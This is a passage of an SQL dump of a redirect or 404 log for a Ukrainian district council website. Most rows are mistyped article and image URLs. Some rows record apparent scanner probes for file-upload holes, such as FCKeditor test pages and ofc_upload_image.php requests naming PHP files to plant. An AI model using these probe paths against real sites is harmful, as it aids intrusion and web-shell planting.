00:00:00',301),(12055,'http://malyn-rayrada.org.ua/index.php/918-shchodo-orendi-komunalnogo-majna?tmpl=component&print=1&layout=default&page=','','','',2,0,'2014-12-28 01:18:17','0000-00-00 00:00:00',301),(12056,'http://malyn-rayrada.org.ua/index.php/922-do-vidoma-deputativ-rajonnoji-radi-informatsiya-shchodo-provedennya-postijnikh-komisij?tmpl=component&print=1&layout=default&page=','','','',2,0,'2014-12-28 01:18:36','0000-00-00 00:00:00',301),(12057,'http://malyn-rayrada.org.ua/index.php/915-ogoloshennya-shchodo-orendi-komunalnogo-majna?tmpl=component&print=1&layout=default&page=','','','',2,0,'2014-12-28 01:40:24','0000-00-00 00:00:00',301),(12058,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1324:2014-05-27-13-24-07&lang=uk&option=com_content&view=article','','','',3,0,'2014-12-28 03:36:41','0000-00-00 00:00:00',301),(12059,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1353:2014-07-01-05-08-54&lang=uk&option=com_content&view=article','','','',3,0,'2014-12-28 05:04:06','0000-00-00 00:00:00',301),(12060,'http://www.malyn-rayrada.org.ua/attachments/article/945/Матеріали Буркуш.pdf','','','',1,0,'2014-12-28 08:05:54','0000-00-00 00:00:00',301),(12061,'http://www.malyn-rayrada.org.ua/index.php?Itemid=107&catid=59:--20062014-&id=1336:2014-06-10-11-01-06&lang=uk&option=com_content&view=article','','','',2,0,'2014-12-28 11:24:30','0000-00-00 00:00:00',301),(12062,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1340:------l---28r&lang=ru&option=com_content&view=article','','','',4,0,'2014-12-28 17:55:05','0000-00-00 00:00:00',301),(12063,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1178:2014-01-21-12-39-34&lang=ru&option=com_content&view=article','','','',1,0,'2014-12-29 00:17:52','0000-00-00 00:00:00',301),(12064,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1379:2014-09-01-08-47-25&catid=11&Itemid=14&lang=uk','','','',2,0,'2014-12-29 06:14:20','0000-00-00 00:00:00',301),(12065,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1354:-lr-&lang=uk&option=com_content&view=article','','http://go.mail.ru/search?q=%ED%E5%F0%F3%F5%EE%EC%E5+%EC%E0%E9%ED%EE+%ED%E0+%EC%B3%F1%FC%EA%F3+%F0%E0%E4%F3+%E0+%EE%F4%EE%F0%EC%EB%FE%BA+%EA%EE%EC%F3%E','',3,0,'2014-12-29 07:25:17','0000-00-00 00:00:00',301),(12066,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1154:7-&catid=11&lang=ru','','','',1,0,'2014-12-29 10:46:52','0000-00-00 00:00:00',301),(12067,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1337:2014-06-10-11-11-42&catid=11&lang=en&Itemid=','','','',1,0,'2014-12-29 17:36:31','0000-00-00 00:00:00',301),(12068,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1337:2014-06-10-11-11-42&catid=11&lang=en&Itemid=0','','','',1,0,'2014-12-29 18:04:50','0000-00-00 00:00:00',301),(12069,'http://www.malyn-rayrada.org.ua/bible/index.php','','','',1,0,'2014-12-29 20:41:48','0000-00-00 00:00:00',301),(12070,'http://www.malyn-rayrada.org.ua/index.php?Itemid=95&catid=54&id=1150:2013-11-28-14-53-17&lang=ru&option=com_content&view=article','','','',2,0,'2014-12-31 07:21:42','0000-00-00 00:00:00',301),(12071,'http://malyn-rayrada.org.ua/index.php/index.php?option=com_user&view=register','','','',2,0,'2014-12-31 07:57:43','0000-00-00 00:00:00',301),(12072,'http://malyn-rayrada.org.ua/index.php?option=com_user&view=register','','','',11,0,'2014-12-31 07:57:46','0000-00-00 00:00:00',301),(12073,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1147:2013-11-28-09-57-12&lang=uk&option=com_content&view=article','','','',1,0,'2014-12-31 10:30:06','0000-00-00 00:00:00',301),(12074,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56&id=1194:-2012-2015-&lang=uk&option=com_content&view=article','','http://go.mail.ru/search?q=%D0%B2%D0%BD%D0%B5%D1%81%D0%B5%D0%BD%D0%BD%D1%8F%20%D0%B7%D0%BC%D1%96%D0%BD%D0%B8%20%D0%B4%D0%BE%20%D1%80%D0%B0%D0%B9%D0%BE','',6,0,'2014-12-31 10:48:30','0000-00-00 00:00:00',301),(12075,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1026:2013-06-14-05-02-34&lang=ru&option=com_content&view=article','','','',1,0,'2015-01-01 20:26:07','0000-00-00 00:00:00',301),(12076,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1095:2013-09-24-13-25-55&tmpl=component&print=1&layout=default&page=&lang=uk','','','',3,0,'2015-01-01 20:30:09','0000-00-00 00:00:00',301),(12077,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51:--19072013-&id=1026:2013-06-14-05-02-34&lang=ru&option=com_content&view=article','','','',1,0,'2015-01-02 04:22:34','0000-00-00 00:00:00',301),(12078,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1072:-24-6-&lang=uk&option=com_content&view=article','','','',5,0,'2015-01-02 11:37:56','0000-00-00 00:00:00',301),(12079,'http://www.malyn-rayrada.org.ua/FCKeditor/editor/filemanager/connectors/uploadtest.html','','','',4,0,'2015-01-02 20:54:37','0000-00-00 00:00:00',301),(12080,'http://www.malyn-rayrada.org.ua/admin/fckeditor/editor/filemanager/browser/default/connectors/uploadtest.html','','','',1,0,'2015-01-02 20:54:39','0000-00-00 00:00:00',301),(12081,'http://www.malyn-rayrada.org.ua/editor/editor/filemanager/browser/default/connectors/uploadtest.html','','','',1,0,'2015-01-02 20:54:41','0000-00-00 00:00:00',301),(12082,'http://www.malyn-rayrada.org.ua/Administrator/fckeditor/editor/filemanager/browser/default/connectors/test.html','','','',1,0,'2015-01-02 20:54:46','0000-00-00 00:00:00',301),(12083,'http://www.malyn-rayrada.org.ua/Administrator/fckeditor/editor/filemanager/browser/default/connectors/uploadtest.html','','','',1,0,'2015-01-02 20:54:49','0000-00-00 00:00:00',301),(12084,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=986:-20-&lang=uk&option=com_content&view=article','','','',1,0,'2015-01-03 00:06:54','0000-00-00 00:00:00',301),(12085,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=15&id=1068:-22-&lang=uk&option=com_content&view=article','','','',1,0,'2015-01-03 01:21:52','0000-00-00 00:00:00',301),(12086,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53&id=1114:-lr-&lang=uk&option=com_content&view=article','','','',1,0,'2015-01-03 01:38:50','0000-00-00 00:00:00',301),(12087,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1319:--------2014--&lang=ru&option=com_content&view=article','','','',2,0,'2015-01-03 04:40:00','0000-00-00 00:00:00',301),(12088,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/file:/C:/Users/ACERUS1/AppData/Local/Temp/msohtmlclip1/01/clip_image001.gif','','http://malyn-rayrada.org.ua/','',4,0,'2015-01-03 05:56:42','0000-00-00 00:00:00',301),(12089,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1111:2013-10-22-16-06-36&lang=uk&option=com_content&view=article','','','',2,0,'2015-01-03 13:37:08','0000-00-00 00:00:00',301),(12090,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51&id=1031:2013-06-17-06-49-26&lang=uk&option=com_content&view=article','','','',1,0,'2015-01-03 15:06:17','0000-00-00 00:00:00',301),(12091,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1214:2014-02-18-09-51-45&lang=ru&option=com_content&view=article','','','',1,0,'2015-01-03 19:46:41','0000-00-00 00:00:00',301),(12092,'http://www.malyn-rayrada.org.ua/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=jne.php','','','',1,0,'2015-01-03 23:48:38','0000-00-00 00:00:00',301),(12093,'http://www.malyn-rayrada.org.ua/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=jne.php','','','',1,0,'2015-01-03 23:48:39','0000-00-00 00:00:00',301),(12094,'http://www.malyn-rayrada.org.ua/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=jne.php','','','',1,0,'2015-01-03 23:48:40','0000-00-00 00:00:00',301),(12095,'http://www.malyn-rayrada.org.ua/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=jne.php','','','',1,0,'2015-01-03 23:48:41','0000-00-00 00:00:00',301),(12096,'http://www.malyn-rayrada.org.ua/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php','','','',1,0,'2015-01-03 23:48:42','0000-00-00 00:00:00',301),(12097,'http://www.malyn-rayrada.org.ua/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php','','','',8,0,'2015-01-03 23:48:43','0000-00-00 00:00:00',301),(12098,'http://www.malyn-rayrada.org.ua/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php','','','',1,0,'2015-01-03 23:48:44','0000-00-00 00:00:00',301),(12099,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1152:2013-11-28-14-58-05&lang=uk&option=com_content&view=article','','','',3,0,'2015-01-04 09:16:57','0000-00-00 00:00:00',301),(12100,'http://www.malyn-rayrada.org.ua/board/index.php','','','',3,0,'2015-01-04 13:41:05','0000-00-00 00:00:00',301),(12101,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1251:2014-03-24-07-11-22&lang=ru&option=com_content&view=article','','','',5,0,'2015-01-04 18:25:01','0000-00-00 00:00:00',301),(12102,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--29112013-/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--29112013-/666-pro-zvernennja-shhodo-zabezpechennja-socialnih','',1,0,'2015-01-04 19:21:08','0000-00-00 00:00:00',301),(12103,'http://www.malyn-rayrada.org.ua/av/index.php','','','',1,0,'2015-01-05 00:08:28','0000-00-00 00:00:00',301),(12104,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1001:2013-04-30-12-14-17&lang=uk&option=com_content&view=article','','','',1,0,'2015-01-05 09:34:36','0000-00-00 00:00:00',301),(12105,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1035:2013-06-25-09-55-31&lang=ru&option=com_content&view=article','','','',1,0,'2015-01-05 21:11:52','0000-00-00 00:00:00',301),(12106,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/images/stories/0_dubr_1.jpg','','','',3,0,'2015-01-05 22:15:38','0000-00-00 00:00:00',301),(12107,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/images/stories/golodomor3.jpg','','','',3,0,'2015-01-05 22:16:07','0000-00-00 00:00:00',301),(12108,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/images/stories/pb25_2.jpg','','','',3,0,'2015-01-05 22:16:41','0000-00-00 00:00:00',301),(12109,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/images/stories/wgolodomor32.jpg','','','',3,0,'2015-01-05 22:17:08','0000-00-00 00:00:00',301),(12110,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/images/stories/golodomor2.jpg','','','',4,0,'2015-01-05 22:17:37','0000-00-00 00:00:00',301),(12111,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/images/stories/pb25_1.jpg','','','',3,0,'2015-01-05 22:18:03','0000-00-00 00:00:00',301),(12112,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/images/stories/wgolodomor33.jpg','','','',4,0,'2015-01-05 22:18:29','0000-00-00 00:00:00',301),(12113,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/images/stories/pb25_3.jpg','','','',3,0,'2015-01-05 22:18:54','0000-00-00 00:00:00',301),(12114,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/images/stories/goodomor_1.jpg','','','',3,0,'2015-01-05 22:19:24','0000-00-00 00:00:00',301),(12115,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/images/stories/pb25_4.jpg','','','',3,0,'2015-01-05 22:19:51','0000-00-00 00:00:00',301),(12116,'http://malyn-rayrada.org.ua/engine/engine.php','','','',4,0,'2015-01-05 23:25:40','0000-00-00 00:00:00',301),(12117,'http://malyn-rayrada.org.ua/new/index.php','','','',1,0,'2015-01-06 01:27:44','0000-00-00 00:00:00',301),(12118,'http://malyn-rayrada.org.ua/archive/index.php','','','',2,0,'2015-01-06 02:40:52','0000-00-00 00:00:00',301),(12119,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1165:-2014-&lang=uk&option=com_content&view=article','','','',4,0,'2015-01-06 04:37:27','0000-00-00 00:00:00',301),(12120,'http://www.malyn-rayrada.org.ua/index.php?Itemid=98&catid=57:--15042014-&id=1268:-l-r&lang=ru&option=com_content&view=article','','','',1,0,'2015-01-06 04:54:36','0000-00-00 00:00:00',301),(12121,'http://www.malyn-rayrada.org.ua/joomla/index.php','','','',1,0,'2015-01-06 06:00:35','0000-00-00 00:00:00',301),(12122,'http://malyn-rayrada.org.ua/site/index.php','','','',5,0,'2015-01-06 11:50:03','0000-00-00 00:00:00',301),(12123,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53:--25102013-&id=1118:2013-10-25-12-24-30&lang=uk&option=com_content&view=article','','','',1,0,'2015-01-06 12:03:17','0000-00-00 00:00:00',301),(12124,'http://www.malyn-rayrada.org.ua/portal/index.php','','','',3,0,'2015-01-06 12:21:38','0000-00-00 00:00:00',301),(12125,'http://malyn-rayrada.org.ua/rezultati-diyalnosti-prezidenta-ukrayini-za-rik.html/index.php','','','',2,0,'2015-01-06 14:01:19','0000-00-00 00:00:00',301),(12126,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1320:--------15--2010---12-l----r&lang=ru&option=com_content&view=article','','','',4,0,'2015-01-06 16:35:58','0000-00-00 00:00:00',301),(12127,'http://www.malyn-rayrada.org.ua/vanhat/index.php','','','',1,0,'2015-01-06 20:05:50','0000-00-00 00:00:00',301),(12128,'http://www.malyn-rayrada.org.ua/2010/index.php','','','',1,0,'2015-01-06 22:56:46','0000-00-00 00:00:00',301),(12129,'http://www.malyn-rayrada.org.ua/web/index.php','','','',2,0,'2015-01-06 23:37:25','0000-00-00 00:00:00',301),(12130,'http://www.malyn-rayrada.org.ua/index.php?Itemid=105&catid=58:--30042014-&id=1293:-2014-&lang=ru&option=com_content&view=article','','','',2,0,'2015-01-07 01:28:53','0000-00-00 00:00:00',301),(12131,'http://malyn-rayrada.org.ua/text/index.php','','','',1,0,'2015-01-07 04:50:20','0000-00-00 00:00:00',301),(12132,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--27042012-/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--27042012-/307-pro-pogodzhennja-otrimannja-specialnogo-dozvolu-na','',1,0,'2015-01-07 05:14:49','0000-00-00 00:00:00',301),(12133,'http://malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1349:-31-&lang=uk&option=com_content&view=article','','','',1,0,'2015-01-07 16:08:37','0000-00-00 00:00:00',301),(12134,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1279:2014-04-13-11-36-46&lang=uk&option=com_content&view=article','','','',3,0,'2015-01-08 02:37:53','0000-00-00 00:00:00',301),(12135,'http://malyn-rayrada.org.ua/monitoring-novyn/index.php','','','',4,0,'2015-01-08 04:22:38','0000-00-00 00:00:00',301),(12136,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1335:2014-06-07-10-58-30&lang=ru&option=com_content&view=article','','','',1,0,'2015-01-08 05:08:01','0000-00-00 00:00:00',301),(12137,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1059:2013-07-24-05-42-15&lang=ru&option=com_content&view=article','','','',3,0,'2015-01-08 08:58:06','0000-00-00 00:00:00',301),(12138,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/624-istorija-uspihu-tov-junigran','',5,0,'2015-01-08 13:39:48','0000-00-00 00:00:00',301),(12139,'http://www.malyn-rayrada.org.ua/v1/index.php','','','',1,0,'2015-01-08 21:10:07','0000-00-00 00:00:00',301),(12140,'http://www.malyn-rayrada.org.ua/raydolap/index.php','','','',1,0,'2015-01-09 01:51:59','0000-00-00 00:00:00',301),(12141,'http://www.malyn-rayrada.org.ua/index.php?Itemid=98&catid=57:--15042014-&id=1280:-2014-&lang=uk&option=com_content&view=article','','','',3,0,'2015-01-09 09:48:26','0000-00-00 00:00:00',301),(12142,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1173:2014-01-15-10-37-18&lang=uk&option=com_content&view=article','','','',1,0,'2015-01-09 19:00:34','0000-00-00 00:00:00',301),(12143,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1034:2013-06-23-15-11-25&lang=ru&option=com_content&view=article','','','',3,0,'2015-01-09 22:25:06','0000-00-00 00:00:00',301),(12144,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51&id=1053:2013-07-19-11-34-22&lang=ru&option=com_content&view=article','','','',2,0,'2015-01-10 03:57:19','0000-00-00 00:00:00',301),(12145,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/images/stories/koster11.jpg','','','',2,0,'2015-01-10 11:51:32','0000-00-00 00:00:00',301),(12146,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/images/stories/dmitrenko11.jpg','','','',2,0,'2015-01-10 11:51:37','0000-00-00 00:00:00',301),(12147,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/images/stories/lyuda_bux.JPG','','','',3,0,'2015-01-10 11:51:45','0000-00-00 00:00:00',301),(12148,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/images/stories/sasha_rada_kardan.JPG','','','',3,0,'2015-01-10 11:51:53','0000-00-00 00:00:00',301),(12149,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/images/stories/terechenko.jpg','','','',2,0,'2015-01-10 11:52:02','0000-00-00 00:00:00',301),(12150,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/images/stories/annenkov.jpg','','','',2,0,'2015-01-10 11:52:07','0000-00-00 00:00:00',301),(12151,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/images/stories/sacha_rada.JPG','','','',3,0,'2015-01-10 11:52:13','0000-00-00 00:00:00',301),(12152,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/images/stories/sss.jpg','','','',3,0,'2015-01-10 11:52:18','0000-00-00 00:00:00',301),(12153,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/images/stories/dinak_11.jpg','','','',3,0,'2015-01-10 11:52:24','0000-00-00 00:00:00',301),(12154,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/images/stories/reznik11.jpg','','','',3,0,'2015-01-10 11:52:30','0000-00-00 00:00:00',301),(12155,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/images/stories/lar12.jpg','','','',3,0,'2015-01-10 11:52:36','0000-00-00 00:00:00',301),(12156,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/images/stories/n.jpg','','','',1,0,'2015-01-10 11:52:42','0000-00-00 00:00:00',301),(12157,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/images/stories/marina.jpg','','','',3,0,'2015-01-10 11:52:48','0000-00-00 00:00:00',301),(12158,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/images/stories/lena_yor.JPG','','','',3,0,'2015-01-10 11:52:54','0000-00-00 00:00:00',301),(12159,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/images/stories/texprac.jpg','','','',3,0,'2015-01-10 11:52:59','0000-00-00 00:00:00',301),(12160,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/images/stories/kravch11.jpg','','','',2,0,'2015-01-10 11:53:09','0000-00-00 00:00:00',301),(12161,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=992:-3-&lang=en&option=com_content&view=article','','','',1,0,'2015-01-10 15:20:22','0000-00-00 00:00:00',301),(12162,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1088:2013-09-19-12-06-07&lang=ru&option=com_content&view=article','','','',1,0,'2015-01-11 05:53:11','0000-00-00 00:00:00',301),(12163,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1264:2014-04-01-11-27-13&lang=uk&option=com_content&view=article','','','',2,0,'2015-01-11 16:34:05','0000-00-00 00:00:00',301),(12164,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38&id=501:2011-12-14-13-07-32&lang=uk&option=com_content&view=article','','','',4,0,'2015-01-11 20:54:46','0000-00-00 00:00:00',301),(12165,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1317:2014-05-25-18-25-09&lang=uk&option=com_content&view=article','','','',1,0,'2015-01-11 22:05:44','0000-00-00 00:00:00',301),(12166,'http://malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1368:2014-07-17-04-39-11&lang=uk&option=com_content&view=article','','','',1,0,'2015-01-12 01:15:54','0000-00-00 00:00:00',301),(12167,'http://www.malyn-rayrada.org.ua/index.php?Itemid=98&catid=57:--15042014-&id=1269:-3110&lang=ru&option=com_content&view=article','','','',4,0,'2015-01-12 01:16:17','0000-00-00 00:00:00',301),(12168,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1183:2014-01-28-09-18-31&catid=11&Itemid=14&lang=uk','','','',1,0,'2015-01-12 01:58:13','0000-00-00 00:00:00',301),(12169,'http://www.malyn-rayrada.org.ua/index.php?Itemid=17&catid=10:2010-06-05-13-46-44&id=1253:-2013-&lang=ru&option=com_content&view=article','','','',3,0,'2015-01-12 04:36:55','0000-00-00 00:00:00',301),(12170,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1265:2014-04-01-11-43-46&lang=ru&option=com_content&view=article','','','',2,0,'2015-01-12 08:14:15','0000-00-00 00:00:00',301),(12171,'http://www.malyn-rayrada.org.ua/administrator/tabaka','','','',2,0,'2015-01-12 12:55:31','0000-00-00 00:00:00',301),(12172,'http://www.malyn-rayrada.org.ua/administrator/tabaka/','','','',1,0,'2015-01-12 12:56:16','0000-00-00 00:00:00',301),(12173,'http://malyn-rayrada.org.ua/index','','','',1,0,'2015-01-12 17:35:46','0000-00-00 00:00:00',301),(12174,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1061:2013-07-29-08-58-16&lang=ru&option=com_content&view=article','','','',1,0,'2015-01-12 23:14:53','0000-00-00 00:00:00',301),(12175,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1232:2014-03-02-14-32-43&lang=ru&option=com_content&view=article','','','',3,0,'2015-01-13 02:28:36','0000-00-00 00:00:00',301),(12176,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1025:------------2011-2015-&lang=uk&option=com_content&view=article','','','',1,0,'2015-01-13 06:34:38','0000-00-00 00:00:00',301),(12177,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1235:2014-03-06-13-25-26&lang=ru&option=com_content&view=article','','','',3,0,'2015-01-13 08:03:34','0000-00-00 00:00:00',301),(12178,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1016:2013-06-03-11-41-36&lang=ru&option=com_content&view=article','','','',1,0,'2015-01-13 15:35:50','0000-00-00 00:00:00',301),(12179,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56&id=1200:2014-01-31-07-40-52&lang=ru&option=com_content&view=article','','','',6,0,'2015-01-13 16:21:47','0000-00-00 00:00:00',301),(12180,'http://www.malyn-rayrada.org.ua/2013/index.php','','','',1,0,'2015-01-13 18:45:36','0000-00-00 00:00:00',301),(12181,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1032:-------l-r--2012-2015-&lang=uk&option=com_content&view=article','','','',1,0,'2015-01-13 23:12:50','0000-00-00 00:00:00',301),(12182,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1336:2014-06-10-11-01-06&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',1,0,'2015-01-14 03:16:58','0000-00-00 00:00:00',301),(12183,'http://malyn-rayrada.org.ua/lmr/index.php','','','',1,0,'2015-01-14 09:08:25','0000-00-00 00:00:00',301),(12184,'http://malyn-rayrada.org.ua//wp-login.php','','','',4,0,'2015-01-14 11:02:21','0000-00-00 00:00:00',301),(12185,'http://malyn-rayrada.org.ua/index.php?Itemid=6&id=5:2010-06-05-12-51-34&lang=en&layout=blog&option=com_content&view=category','','','',3,0,'2015-01-14 12:48:49','0000-00-00 00:00:00',301),(12186,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1204:2014-01-31-07-51-23&lang=ru&option=com_content&view=article','','','',1,0,'2015-01-14 12:48:56','0000-00-00 00:00:00',301),(12187,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1278:2014-04-11-13-44-30&lang=uk&option=com_content&view=article','','','',4,0,'2015-01-14 15:47:25','0000-00-00 00:00:00',301),(12188,'http://www.malyn-rayrada.org.ua//administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=wawalo.php','','','',13,0,'2015-01-14 16:35:26','0000-00-00 00:00:00',301),(12189,'http://www.malyn-rayrada.org.ua//administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=wawalo.php.pHp','','','',13,0,'2015-01-14 16:35:28','0000-00-00 00:00:00',301),(12190,'http://www.malyn-rayrada.org.ua/index.php?Itemid=17&catid=10:2010-06-05-13-46-44&id=1271:2014-04-09-05-14-20&lang=uk&option=com_content&view=article','','','',4,0,'2015-01-14 21:45:48','0000-00-00 00:00:00',301),(12191,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1180:27-4-2014-&catid=11&Itemid=14&lang=uk','','','',1,0,'2015-01-14 23:25:48','0000-00-00 00:00:00',301),(12192,'http://www.malyn-rayrada.org.ua/index.php/958-do-vidoma-deputativ-rajonnoji-radi','','','',32,0,'2015-01-15 06:45:41','0000-00-00 00:00:00',301),(12193,'http://malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1371:2014-08-04-19-11-42&lang=ru&option=com_content&view=article','','','',2,0,'2015-01-15 12:58:58','0000-00-00 00:00:00',301),(12194,'http://www.malyn-rayrada.org.ua/index.php?Itemid=105&catid=58:--30042014-&id=1293:-2014-&lang=uk&option=com_content&view=article','','','',3,0,'2015-01-15 21:58:37','0000-00-00 00:00:00',301),(12195,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1000:1&lang=en&option=com_content&view=article','','','',1,0,'2015-01-16 00:56:41','0000-00-00 00:00:00',301),(12196,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1223:--28-----6-&lang=ru&option=com_content&view=article','','','',2,0,'2015-01-16 07:00:58','0000-00-00 00:00:00',301),(12197,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1316:2014-05-20-12-49-29&lang=ru&option=com_content&view=article','','','',1,0,'2015-01-16 08:11:27','0000-00-00 00:00:00',301),(12198,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=991:2013-04-22-08-24-54&lang=en&option=com_content&view=article','','','',1,0,'2015-01-16 14:32:34','0000-00-00 00:00:00',301),(12199,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1060:2013-07-27-10-13-15&lang=uk&option=com_content&view=article','','','',2,0,'2015-01-17 05:33:35','0000-00-00 00:00:00',301),(12200,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47&id=928:2013-02-21-09-10-17&lang=ru&option=com_content&view=article','','','',5,0,'2015-01-17 11:36:20','0000-00-00 00:00:00',301),(12201,'http://www.malyn-rayrada.org.ua/index.php?Itemid=107&catid=59:--20062014-&id=1340:-l-28r&lang=uk&option=com_content&view=article','','','',3,0,'2015-01-17 17:34:57','0000-00-00 